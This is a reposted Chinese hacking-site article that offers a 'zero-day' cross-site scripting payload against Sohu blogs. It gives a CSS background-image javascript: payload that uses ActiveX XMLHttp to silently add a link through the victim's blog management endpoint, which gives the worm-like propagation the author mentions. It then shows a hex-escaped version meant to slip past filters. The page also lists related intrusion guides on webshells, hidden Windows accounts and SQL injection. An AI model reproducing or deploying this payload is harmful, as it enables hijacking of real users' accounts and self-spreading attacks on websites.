手机
当前位置:查字典教程网 >实用技巧 >安全教程 >XSS 0DAY代码
XSS 0DAY代码
摘要:文章作者:茄子宝信息来源:邪恶八进制信息安全团队(www.eviloctal.com)看到梦之光芒放出来了!我也不藏了!10月7日的时候我就...

文章作者:茄子宝

信息来源:邪恶八进制信息安全团队(www.eviloctal.com)

看到梦之光芒放出来了!我也不藏了!

10月7日的时候我就发的日志,提示了大家!这里算是上次发的XSSWORM初尝试的续吧.

其实很简单,就是两次转码.

<DIVSTYLE="background-image:url(javascript:varXmlHttp=newActiveXObject("Microsoft.XMLhttp");XmlHttp.Open("get","/manage/link.do?m=add&title=S0n9%20bl09&desc=This%20is%20XSS%20TEST%20%21&link=http%3A//s0n9.blog.sohu.com&_",true);XmlHttp.send(null);)">

ASCII转码参考http://s0n9.blog.sohu.com/16002288.html

写成下面16进制转义字符串

<divstyle="background-image:07507206C02806A06107606107306307206907007403A06507606106C02805307407206906E06702E06607206F06D04306806107204306F06......"></div>

【XSS 0DAY代码】相关文章:

内网渗透-----如何打开突破口

整理比较全的Access SQL注入参考

php+mysql注入页面实现

入侵ASP.net网站的经验附利用代码

NtGodMode.exe任意密码登录windows系统帐号下载

开放IPC$共享

非常不错的脚本入侵基础知识总结第1/2页

一个黑客所需的基本技能总结

webshell查看IIS站点配置的方法

win2003下创建永远的隐藏帐户的图文教程

精品推荐
分类导航